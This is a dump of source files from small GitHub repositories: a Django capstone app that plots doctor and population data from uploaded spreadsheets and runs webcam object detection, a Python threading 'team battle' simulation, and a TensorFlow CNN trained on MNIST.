"text": "from django.shortcuts import render\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\n# Create your views here.\ndef preventative(request):\n try:\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n\n dataset = pd.read_excel(settings.BASE_DIR + uploaded_file_url)\n dataset = dataset.drop([0])\n dataset = dataset.drop([1])\n dataset = dataset.drop([95])\n dataset = dataset.rename(columns={\n 'Type': 'Row Labels',\n 'TRUE': 'Count of Doctors',\n 'Unnamed: 2': 'Centers',\n 'Unnamed: 3': 'Population',\n 'Unnamed: 4': 'Areas',\n 'Unnamed: 5': 'Zones',\n })\n imputer = Imputer(missing_values = 'nan', strategy = 'mean', axis = 0)\n dataset = dataset.dropna(how='any')\n\n maximum_doc = dataset['Count of Doctors'].groupby(dataset['Zones']).sum().max()\n max_dict = dict(dataset['Count of Doctors'].groupby(dataset['Zones']).sum())\n max_zone = list(max_dict.keys())[list(max_dict.values()).index(maximum_doc)]\n plt.scatter(dataset['Count of Doctors'], dataset['Zones'])\n plt.suptitle('Count of Doctors vs Zones')\n plt.xlabel('Count of Doctors')\n plt.ylabel('Zones')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_1.png', bbox_inches = 'tight')\n plt.clf()\n\n sheets = pd.read_excel(settings.BASE_DIR + uploaded_file_url, sheet_name=['sum'])\n dataset = pd.concat(sheets[frame] for frame in sheets.keys())\n dataset = dataset.drop([2])\n dataset = dataset.rename(columns={\n 'Unnamed: 0': 'Row Labels',\n 'Unnamed: 1': 'Area',\n 'Unnamed: 2': 'Count of center',\n 'Unnamed: 3': 'doctors',\n 'Unnamed: 4': 'pop',\n 'Unnamed: 5': 'Pop/center',\n 'Unnamed: 6': 'Pop/Dr',\n 'Unnamed: 7': 'Dr/cr',\n })\n imputer = Imputer(missing_values = 'nan', strategy = 'mean', axis = 0)\n dataset = dataset.dropna(how='any')\n\n plt.scatter(dataset['Count of center'], dataset['Area'])\n plt.suptitle('Count of center vs Area')\n plt.xlabel('Count of center')\n plt.ylabel('Area')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_2.png', bbox_inches = 'tight')\n plt.clf()\n\n plt.scatter(dataset['doctors'], dataset['Area'])\n plt.suptitle('doctors vs Area')\n plt.xlabel('doctors')\n plt.ylabel('Area')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_3.png', bbox_inches = 'tight')\n plt.clf()\n\n plt.scatter(dataset['Pop/center'], dataset['Area'])\n plt.suptitle('Pop/center vs Area')\n plt.xlabel('Pop/center')\n plt.ylabel('Area')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_4.png', bbox_inches = 'tight')\n plt.clf()\n\n minimum_pop = dataset['Pop/Dr'].groupby(dataset['Area']).sum().min()\n min_dict = dict(dataset['Pop/Dr'].groupby(dataset['Area']).sum())\n areas_list = []\n for i in min_dict:\n if min_dict[i] > 5000:\n areas_list.append(list(min_dict.keys())[list(min_dict.values()).index(min_dict[i])])\n min_area = list(min_dict.keys())[list(min_dict.values()).index(minimum_pop)]\n plt.scatter(dataset['Pop/Dr'], dataset['Area'])\n plt.suptitle('Pop/Dr vs Area')\n plt.xlabel('Pop/Dr')\n plt.ylabel('Area')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_5.png', bbox_inches = 'tight')\n plt.clf()\n\n return render(request, 'preventative.html', {'uploaded_file_url': uploaded_file_url, 'maximum_doc': maximum_doc, 'max_zone': max_zone, 'minimum_pop': int(minimum_pop), 'areas_list': areas_list, 'min_area': min_area})\n return render(request, 'preventative.html')\n except:\n return render(request, 'preventative.html', {'error': 'Please Select A File'})\n"
},
{
"alpha_fraction": 0.6967741847038269,
"alphanum_fraction": 0.6967741847038269,
"avg_line_length": 18.5,
"blob_id": "ce6822361bd8b45289943151171f5ed2610716a6",
"content_id": "53f66345b93765d8d7ada55e42ef2e96223d078d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 8,
"path": "/target/dist/capstone-django-1.0.dev0/capstone/insurance/urls.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'insurance'\n\nurlpatterns = [\n url('insurance/', views.insurance, name = 'insurance'),\n]"
},
{
"alpha_fraction": 0.71856290102005,
"alphanum_fraction": 0.71856290102005,
"avg_line_length": 20,
"blob_id": "3a2b536089effc560aef510b63151b30a3474406",
"content_id": "25f9b5f817a85283ab4b0c063d24cf1e6ec6e852",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 8,
"path": "/src/main/python/capstone/preventative/urls.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'preventative'\n\nurlpatterns = [\n url('preventative/', views.preventative, name = 'preventative'),\n]"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 18.799999237060547,
"blob_id": "037910a5dafed04b602ffea76cbb3b0c34de37a2",
"content_id": "491ce91ae7c99c078aeb7266cad1804dcbd59d10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 5,
"path": "/src/main/python/capstone/preventative/apps.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass PreventativeConfig(AppConfig):\n name = 'preventative'\n"
},
{
"alpha_fraction": 0.7084210515022278,
"alphanum_fraction": 0.7189473509788513,
"avg_line_length": 37,
"blob_id": "5f944bc23c1e360f8b72a08b6ab438b7d43912e8",
"content_id": "7d6ad0cefd318d92da9edd67012427bff806af40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 950,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 25,
"path": "/src/main/python/capstone/preventative/tests.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom django.test import TestCase\nfrom django.utils import timezone\n\nfrom .models import Document\n\n# Create your tests here.\n\nclass DocumentModelTests(TestCase):\n\n def test_was_published_recently_with_future_document(self):\n time = timezone.now() + datetime.timedelta(days=30)\n future_document = Document(uploaded_at=time)\n self.assertIs(future_document.was_published_recently(), False)\n\n def test_was_published_recently_with_old_document(self):\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n old_document = Document(uploaded_at=time)\n self.assertIs(old_document.was_published_recently(), False)\n\n def test_was_published_recently_with_recent_document(self):\n time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)\n recent_document = Document(uploaded_at=time)\n self.assertIs(recent_document.was_published_recently(), True)\n"
},
{
"alpha_fraction": 0.6864035129547119,
"alphanum_fraction": 0.6885964870452881,
"avg_line_length": 29.399999618530273,
"blob_id": "1a45b6bded7e524d430e22822d1ae466553a11df",
"content_id": "f71213d7c397377762afa305120685a8afe67990",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 456,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 15,
"path": "/src/main/python/capstone/preventative/models.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\n\nclass Document(models.Model):\n document = models.FileField(upload_to='documents/%Y/%m/%d/')\n uploaded_at = models.DateTimeField(auto_now_add=True)\n def __str__(self):\n return self.document\n def was_published_recently(self):\n now = timezone.now()\n return now - datetime.timedelta(days=1) <= self.uploaded_at <= now\n"
},
{
"alpha_fraction": 0.6888552904129028,
"alphanum_fraction": 0.7017145752906799,
"avg_line_length": 34.41964340209961,
"blob_id": "c0b6817567c50a690159f8af8c86068a5ee2237f",
"content_id": "1a8bab7ba9b2855c687e23321f03676798764351",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3966,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 112,
"path": "/src/main/python/capstone/models/research/object_detection/object_detection_tutorial.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "import os\nimport pathlib\nimport numpy as np\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport cv2\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom IPython.display import display\nfrom object_detection.utils import ops as utils_ops\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\n\ncap = cv2.VideoCapture(0)\n\nif \"models\" in pathlib.Path.cwd().parts:\n while \"models\" in pathlib.Path.cwd().parts:\n os.chdir('..')\n\nutils_ops.tf = tf.compat.v1\ntf.gfile = tf.io.gfile\n\ndef load_model(model_name):\n base_url = 'http://download.tensorflow.org/models/object_detection/'\n model_file = model_name + '.tar.gz'\n model_dir = tf.keras.utils.get_file(\n fname=model_name,\n origin=base_url + model_file,\n untar=True\n )\n model_dir = pathlib.Path(model_dir)/\"saved_model\"\n model = tf.saved_model.load(str(model_dir))\n model = model.signatures['serving_default']\n return model\n\nPATH_TO_LABELS = 'models/research/object_detection/data/mscoco_label_map.pbtxt'\ncategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\nPATH_TO_TEST_IMAGES_DIR = pathlib.Path('models/research/object_detection/test_images')\nTEST_IMAGE_PATHS = sorted(list(PATH_TO_TEST_IMAGES_DIR.glob(\"*.jpg\")))\nTEST_IMAGE_PATHS\n\nmodel_name = 'ssd_mobilenet_v1_coco_2017_11_17'\ndetection_model = load_model(model_name)\nprint(detection_model.inputs)\ndetection_model.output_dtypes\ndetection_model.output_shapes\n\ndef run_inference_for_single_image(model, image):\n image = np.asarray(image)\n input_tensor = tf.convert_to_tensor(image)\n input_tensor = input_tensor[tf.newaxis,...]\n output_dict = model(input_tensor)\n num_detections = int(output_dict.pop('num_detections'))\n output_dict = {key:value[0, :num_detections].numpy() for key,value in output_dict.items()}\n output_dict['num_detections'] = num_detections\n output_dict['detection_classes'] = output_dict['detection_classes'].astype(np.int64)\n if 'detection_masks' in output_dict:\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n output_dict['detection_masks'], output_dict['detection_boxes'],\n image.shape[0], image.shape[1]\n )\n detection_masks_reframed = tf.cast(detection_masks_reframed > 0.5, tf.uint8)\n output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy()\n return output_dict\n\ndef show_inference(model, image_path):\n # image_np = np.array(Image.open(image_path))\n image_np = np.array(image_path)\n output_dict = run_inference_for_single_image(model, image_np)\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n output_dict['detection_boxes'],\n output_dict['detection_classes'],\n output_dict['detection_scores'],\n category_index,\n instance_masks=output_dict.get('detection_masks_reframed', None),\n use_normalized_coordinates=True,\n line_thickness=8\n )\n # display(Image.fromarray(image_np))\n cv2.imshow('image', image_np)\n\n# for image_path in TEST_IMAGE_PATHS:\n# show_inference(detection_model, image_path)\n\nwhile True:\n ret, image_path = cap.read()\n show_inference(detection_model, image_path)\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n sys.exit()\n\nmodel_name = \"mask_rcnn_inception_resnet_v2_atrous_coco_2018_01_28\"\nmasking_model = load_model(\"mask_rcnn_inception_resnet_v2_atrous_coco_2018_01_28\")\nmasking_model.output_shapes\n\n# for image_path in TEST_IMAGE_PATHS:\n# show_inference(masking_model, image_path)\n\nwhile True:\n ret, image_path = cap.read()\n show_inference(masking_model, image_path)\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n sys.exit()"
},
{
"alpha_fraction": 0.704402506351471,
"alphanum_fraction": 0.704402506351471,
"avg_line_length": 19,
"blob_id": "5a5e815d4c570c2ba72ec45ce6c7baea69e4a2ae",
"content_id": "0d299c3a39b476c7a74c1b128bb85b1183bd4a06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 159,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 8,
"path": "/target/dist/capstone-django-1.0.dev0/build/lib/capstone/diagnostic/urls.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'diagnostic'\n\nurlpatterns = [\n url('diagnostic/', views.diagnostic, name = 'diagnostic'),\n]"
},
{
"alpha_fraction": 0.7593985199928284,
"alphanum_fraction": 0.7593985199928284,
"avg_line_length": 21.16666603088379,
"blob_id": "cf814b09724c4e61e9f195cf053a86dc0388add4",
"content_id": "c70874888f12201b258ec7e21a7e0038e4ac1ea4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 6,
"path": "/target/dist/capstone-django-1.0.dev0/build/lib/capstone/insurance/views.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\n\ndef insurance(request):\n return render(request, 'insurance.html')\n"
},
{
"alpha_fraction": 0.6472651362419128,
"alphanum_fraction": 0.6486829519271851,
"avg_line_length": 53.475608825683594,
"blob_id": "0aa96b0937fb7e7fac46729afabef7c4ddeba555",
"content_id": "2e20618fbe4e3eea7abc938fbad7acce0169b8ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 13401,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 246,
"path": "/target/dist/capstone-django-1.0.dev0/setup.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom setuptools import setup\nfrom setuptools.command.install import install as _install\n\nclass install(_install):\n def pre_install_script(self):\n pass\n\n def post_install_script(self):\n pass\n\n def run(self):\n self.pre_install_script()\n\n _install.run(self)\n\n self.post_install_script()\n\nif __name__ == '__main__':\n setup(\n name = 'Capstone-Django',\n version = '1.0.dev0',\n description = '',\n long_description = '',\n author = '',\n author_email = '',\n license = '',\n url = '',\n scripts = [],\n packages = [\n 'capstone.capstone',\n 'capstone.diagnostic',\n 'capstone.insurance',\n 'capstone.preventative',\n 'capstone.diagnostic.migrations',\n 'capstone.insurance.migrations',\n 'capstone.models.official',\n 'capstone.models.tutorials',\n 'capstone.models.official.benchmark',\n 'capstone.models.official.mnist',\n 'capstone.models.official.modeling',\n 'capstone.models.official.nlp',\n 'capstone.models.official.r1',\n 'capstone.models.official.recommendation',\n 'capstone.models.official.staging',\n 'capstone.models.official.transformer',\n 'capstone.models.official.utils',\n 'capstone.models.official.vision',\n 'capstone.models.official.benchmark.models',\n 'capstone.models.official.modeling.activations',\n 'capstone.models.official.modeling.hyperparams',\n 'capstone.models.official.modeling.training',\n 'capstone.models.official.nlp.bert',\n 'capstone.models.official.nlp.xlnet',\n 'capstone.models.official.r1.boosted_trees',\n 'capstone.models.official.r1.resnet',\n 'capstone.models.official.r1.utils',\n 'capstone.models.official.r1.wide_deep',\n 'capstone.models.official.r1.utils.data',\n 'capstone.models.official.staging.shakespeare',\n 'capstone.models.official.transformer.model',\n 'capstone.models.official.transformer.utils',\n 'capstone.models.official.transformer.v2',\n 'capstone.models.official.utils.accelerator',\n 'capstone.models.official.utils.flags',\n 'capstone.models.official.utils.logs',\n 'capstone.models.official.utils.misc',\n 'capstone.models.official.utils.testing',\n 'capstone.models.official.vision.detection',\n 'capstone.models.official.vision.image_classification',\n 'capstone.models.official.vision.detection.configs',\n 'capstone.models.official.vision.detection.dataloader',\n 'capstone.models.official.vision.detection.evaluation',\n 'capstone.models.official.vision.detection.executor',\n 'capstone.models.official.vision.detection.modeling',\n 'capstone.models.official.vision.detection.utils',\n 'capstone.models.official.vision.detection.modeling.architecture',\n 'capstone.models.official.vision.detection.utils.object_detection',\n 'capstone.models.research.adversarial_text',\n 'capstone.models.research.autoencoder',\n 'capstone.models.research.cognitive_mapping_and_planning',\n 'capstone.models.research.cognitive_planning',\n 'capstone.models.research.cvt_text',\n 'capstone.models.research.deeplab',\n 'capstone.models.research.deep_speech',\n 'capstone.models.research.domain_adaptation',\n 'capstone.models.research.feelvos',\n 'capstone.models.research.learning_unsupervised_learning',\n 'capstone.models.research.lstm_object_detection',\n 'capstone.models.research.morph_net',\n 'capstone.models.research.object_detection',\n 'capstone.models.research.real_nvp',\n 'capstone.models.research.sentiment_analysis',\n 'capstone.models.research.slim',\n 'capstone.models.research.adversarial_logit_pairing.datasets',\n 'capstone.models.research.adversarial_text.data',\n 'capstone.models.research.attention_ocr.python.datasets',\n 'capstone.models.research.autoencoder.autoencoder_models',\n 'capstone.models.research.build.lib.object_detection',\n 'capstone.models.research.build.lib.object_detection.anchor_generators',\n 'capstone.models.research.build.lib.object_detection.box_coders',\n 'capstone.models.research.build.lib.object_detection.builders',\n 'capstone.models.research.build.lib.object_detection.core',\n 'capstone.models.research.build.lib.object_detection.dataset_tools',\n 'capstone.models.research.build.lib.object_detection.data_decoders',\n 'capstone.models.research.build.lib.object_detection.inference',\n 'capstone.models.research.build.lib.object_detection.legacy',\n 'capstone.models.research.build.lib.object_detection.matchers',\n 'capstone.models.research.build.lib.object_detection.meta_architectures',\n 'capstone.models.research.build.lib.object_detection.metrics',\n 'capstone.models.research.build.lib.object_detection.models',\n 'capstone.models.research.build.lib.object_detection.predictors',\n 'capstone.models.research.build.lib.object_detection.protos',\n 'capstone.models.research.build.lib.object_detection.tpu_exporters',\n 'capstone.models.research.build.lib.object_detection.utils',\n 'capstone.models.research.build.lib.object_detection.models.keras_models',\n 'capstone.models.research.build.lib.object_detection.predictors.heads',\n 'capstone.models.research.build.lib.object_detection.tpu_exporters.testdata',\n 'capstone.models.research.cognitive_mapping_and_planning.cfgs',\n 'capstone.models.research.cognitive_mapping_and_planning.datasets',\n 'capstone.models.research.cognitive_mapping_and_planning.render',\n 'capstone.models.research.cognitive_mapping_and_planning.scripts',\n 'capstone.models.research.cognitive_mapping_and_planning.src',\n 'capstone.models.research.cognitive_mapping_and_planning.tfcode',\n 'capstone.models.research.cognitive_planning.envs',\n 'capstone.models.research.cognitive_planning.preprocessing',\n 'capstone.models.research.compression.entropy_coder',\n 'capstone.models.research.compression.entropy_coder.all_models',\n 'capstone.models.research.compression.entropy_coder.lib',\n 'capstone.models.research.compression.entropy_coder.model',\n 'capstone.models.research.compression.entropy_coder.progressive',\n 'capstone.models.research.cvt_text.base',\n 'capstone.models.research.cvt_text.corpus_processing',\n 'capstone.models.research.cvt_text.model',\n 'capstone.models.research.cvt_text.task_specific',\n 'capstone.models.research.cvt_text.training',\n 'capstone.models.research.cvt_text.task_specific.word_level',\n 'capstone.models.research.deeplab.core',\n 'capstone.models.research.deeplab.datasets',\n 'capstone.models.research.deeplab.deprecated',\n 'capstone.models.research.deeplab.evaluation',\n 'capstone.models.research.deeplab.utils',\n 'capstone.models.research.deep_speech.data',\n 'capstone.models.research.delf.delf',\n 'capstone.models.research.delf.delf.protos',\n 'capstone.models.research.delf.delf.python',\n 'capstone.models.research.delf.delf.python.detect_to_retrieve',\n 'capstone.models.research.delf.delf.python.examples',\n 'capstone.models.research.domain_adaptation.datasets',\n 'capstone.models.research.domain_adaptation.domain_separation',\n 'capstone.models.research.efficient-hrl.agents',\n 'capstone.models.research.efficient-hrl.context',\n 'capstone.models.research.efficient-hrl.environments',\n 'capstone.models.research.efficient-hrl.utils',\n 'capstone.models.research.feelvos.datasets',\n 'capstone.models.research.feelvos.utils',\n 'capstone.models.research.fivo.fivo',\n 'capstone.models.research.fivo.fivo.data',\n 'capstone.models.research.fivo.fivo.models',\n 'capstone.models.research.gan.mnist',\n 'capstone.models.research.learning_unsupervised_learning.architectures',\n 'capstone.models.research.learning_unsupervised_learning.datasets',\n 'capstone.models.research.learning_unsupervised_learning.meta_objective',\n 'capstone.models.research.lstm_object_detection.builders',\n 'capstone.models.research.lstm_object_detection.inputs',\n 'capstone.models.research.lstm_object_detection.lstm',\n 'capstone.models.research.lstm_object_detection.meta_architectures',\n 'capstone.models.research.lstm_object_detection.metrics',\n 'capstone.models.research.lstm_object_detection.models',\n 'capstone.models.research.lstm_object_detection.protos',\n 'capstone.models.research.lstm_object_detection.utils',\n 'capstone.models.research.maskgan.data',\n 'capstone.models.research.maskgan.losses',\n 'capstone.models.research.maskgan.models',\n 'capstone.models.research.maskgan.model_utils',\n 'capstone.models.research.maskgan.nas_utils',\n 'capstone.models.research.maskgan.regularization',\n 'capstone.models.research.morph_net.framework',\n 'capstone.models.research.morph_net.network_regularizers',\n 'capstone.models.research.morph_net.op_regularizers',\n 'capstone.models.research.morph_net.testing',\n 'capstone.models.research.object_detection.anchor_generators',\n 'capstone.models.research.object_detection.box_coders',\n 'capstone.models.research.object_detection.builders',\n 'capstone.models.research.object_detection.core',\n 'capstone.models.research.object_detection.dataset_tools',\n 'capstone.models.research.object_detection.data_decoders',\n 'capstone.models.research.object_detection.inference',\n 'capstone.models.research.object_detection.legacy',\n 'capstone.models.research.object_detection.matchers',\n 'capstone.models.research.object_detection.meta_architectures',\n 'capstone.models.research.object_detection.metrics',\n 'capstone.models.research.object_detection.models',\n 'capstone.models.research.object_detection.predictors',\n 'capstone.models.research.object_detection.protos',\n 'capstone.models.research.object_detection.tpu_exporters',\n 'capstone.models.research.object_detection.utils',\n 'capstone.models.research.object_detection.models.keras_models',\n 'capstone.models.research.object_detection.predictors.heads',\n 'capstone.models.research.object_detection.tpu_exporters.testdata',\n 'capstone.models.research.qa_kg.model_n2nmn',\n 'capstone.models.research.qa_kg.util',\n 'capstone.models.research.sentiment_analysis.data',\n 'capstone.models.research.seq2species.protos',\n 'capstone.models.research.skip_thoughts.skip_thoughts',\n 'capstone.models.research.skip_thoughts.skip_thoughts.data',\n 'capstone.models.research.skip_thoughts.skip_thoughts.ops',\n 'capstone.models.research.slim.datasets',\n 'capstone.models.research.slim.deployment',\n 'capstone.models.research.slim.nets',\n 'capstone.models.research.slim.preprocessing',\n 'capstone.models.research.slim.nets.mobilenet',\n 'capstone.models.research.slim.nets.nasnet',\n 'capstone.models.research.syntaxnet.dragnn',\n 'capstone.models.research.syntaxnet.dragnn.config_builder',\n 'capstone.models.research.vid2depth.dataset',\n 'capstone.models.research.vid2depth.ops',\n 'capstone.models.samples.cookbook.regression',\n 'capstone.models.tutorials.embedding',\n 'capstone.models.tutorials.image',\n 'capstone.models.tutorials.rnn',\n 'capstone.models.tutorials.image.alexnet',\n 'capstone.models.tutorials.image.cifar10',\n 'capstone.models.tutorials.image.cifar10_estimator',\n 'capstone.models.tutorials.image.mnist',\n 'capstone.models.tutorials.rnn.ptb',\n 'capstone.preventative.migrations'\n ],\n namespace_packages = [],\n py_modules = [],\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python'\n ],\n entry_points = {},\n data_files = [],\n package_data = {},\n install_requires = [],\n dependency_links = [],\n zip_safe = True,\n cmdclass = {'install': install},\n keywords = '',\n python_requires = '',\n obsoletes = [],\n )\n"
}
] | 11 |
sowely/sp5-6 | https://github.com/sowely/sp5-6 | 50ff94c8db4762cf80d373488dbf0deb643ef8b1 | 252ed947beb112238f9595cdfeaa5c1014b79e2c | b5d1f24a4be81d015c3b3a892549beda2695b1eb | refs/heads/main | 2023-05-07T11:06:44.784249 | 2021-05-28T04:09:28 | 2021-05-28T04:09:28 | 371,576,187 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.545760452747345,
"alphanum_fraction": 0.5666217803955078,
"avg_line_length": 28.32653045654297,
"blob_id": "efb53b57a146657f5719f1790d608912e5f91e88",
"content_id": "fe86f42b9b407d7c409afddc0d54449ed52a68fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1486,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 49,
"path": "/prog.py",
"repo_name": "sowely/sp5-6",
"src_encoding": "UTF-8",
"text": "from threading import Thread, Semaphore\r\nimport threading\r\nfrom multiprocessing import Pipe\r\nfrom random import randint\r\nimport os\r\nimport signal\r\nfrom time import sleep, time\r\n\r\ndef f(conn):\r\n global iters, blockChange\r\n teamName = threading.current_thread().getName()\r\n fighters = 5\r\n print(os.getpid())\r\n mutexTime = time()\r\n while fighters > 0:\r\n sleep(0.01)\r\n with blockChange:\r\n print(\"time when iters changes:\", time() - mutexTime)\r\n iters += 1\r\n sleep(1)\r\n print(teamName,\"has\", fighters,\"fighters\")\r\n inc = randint(0, 9)\r\n fighters += inc\r\n print(teamName, \"+\", inc, \"=\", fighters)\r\n dec = randint(0, 9)\r\n conn.send(dec)\r\n print(teamName,\"SEND dec\", dec)\r\n sleep(1) #sleep\r\n dec = conn.recv()\r\n print(teamName,\"RECV dec\", dec)\r\n fighters -= dec\r\n if fighters < 0:\r\n fighters = 0\r\n print(fighters, \"fighters in the\", teamName,\"--------\")\r\n sleep(1)\r\n if fighters == 0:\r\n print(\"LOOSER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\", teamName) #, threading.get_ident())\r\n print(iters // 2,\"iterations\")\r\n os.kill(os.getpid(), signal.SIGTERM) # or signal.SIGKILL\r\n\r\nconn1, conn2 = Pipe()\r\np1 = Thread(target=f, args=(conn1,), name=\"TEAM1\", daemon=True)\r\np2 = Thread(target=f, args=(conn2,), name=\"TEAM2\", daemon=True)\r\nblockChange = Semaphore(value=1)\r\niters = 0\r\np1.start()\r\np2.start()\r\np1.join()\r\np2.join()\r\n"
}
] | 1 |
shanmukha-MaiL/CNN | https://github.com/shanmukha-MaiL/CNN | db179c306f9381958598a25cc7f936f4369c566d | b29448b8b8e93eb77106f1b7552c88b4b5c91e30 | 6d442f01b03a123fef40d56eed7a4c9f8de38431 | refs/heads/master | 2020-03-17T20:40:41.582843 | 2018-05-18T08:04:56 | 2018-05-18T08:04:56 | 133,923,207 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8135592937469482,
"alphanum_fraction": 0.8135592937469482,
"avg_line_length": 28.5,
"blob_id": "cb6c91eee5171340c7983031d805e9fd91244a50",
"content_id": "32c7e9ca1566976168f516034c6deb5f73bfd18c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 59,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 2,
"path": "/README.md",
"repo_name": "shanmukha-MaiL/CNN",
"src_encoding": "UTF-8",
"text": "# CNN\nTraining MNIST data on Convolutional Neural Network.\n"
},
{
"alpha_fraction": 0.6408345699310303,
"alphanum_fraction": 0.6686537265777588,
"avg_line_length": 43.44444274902344,
"blob_id": "48930b747290d454416c752f59f6eb0a58adc538",
"content_id": "20acacc69d0199a41c82e38d8a48f7e2089e329d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2013,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 45,
"path": "/cnn_mnist.py",
"repo_name": "shanmukha-MaiL/CNN",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets('/tmp/data/',one_hot=True)\n\nn_classes = 10\nbatch_size = 128\ntot_epochs = 10\n\nx = tf.placeholder('float',[None,784])\ny = tf.placeholder('float')\ndrop_rate = 0.4\n\ndef convolutional_neural_network(x):\n x = tf.reshape(x,[-1,28,28,1])\n \n con_l1 = tf.layers.conv2d(inputs=x,filters=32,kernel_size=5,padding='same',activation=tf.nn.relu)\n pool_l1 = tf.layers.max_pooling2d(inputs=con_l1,pool_size=2,strides=2,padding='same')\n con_l2 = tf.layers.conv2d(inputs=pool_l1,filters=64,kernel_size=5,padding='same',activation=tf.nn.relu)\n pool_l2 = tf.layers.max_pooling2d(inputs=con_l2,pool_size=2,strides=2,padding='same')\n pool_l2 = tf.reshape(pool_l2,[-1,7*7*64])\n dense = tf.layers.dense(inputs=pool_l2,units=1024,activation=tf.nn.relu)\n drop_out = tf.layers.dropout(inputs=dense,rate=drop_rate,training=True)\n output = tf.layers.dense(inputs=drop_out,units=10,activation=tf.nn.relu)\n return output\n\ndef neural_network_training(x):\n prediction = convolutional_neural_network(x)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction,labels=y))\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n \n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(tot_epochs):\n epoch_loss = 0\n for i in range(int(mnist.train.num_examples/batch_size)):\n epoch_x,epoch_y = mnist.train.next_batch(batch_size)\n j,c = sess.run([optimizer,loss],feed_dict={x:epoch_x,y:epoch_y})\n epoch_loss += c\n print('Epoch ',epoch,' completed.Epoch loss = ',epoch_loss)\n correct = tf.equal(tf.argmax(prediction,1),tf.argmax(y,1))\n accuracy = tf.reduce_mean(tf.cast(correct,'float'))\n print('Accuracy: ',accuracy.eval({x:mnist.test.images,y:mnist.test.labels}))\n \nneural_network_training(x) \n \n"
},
{
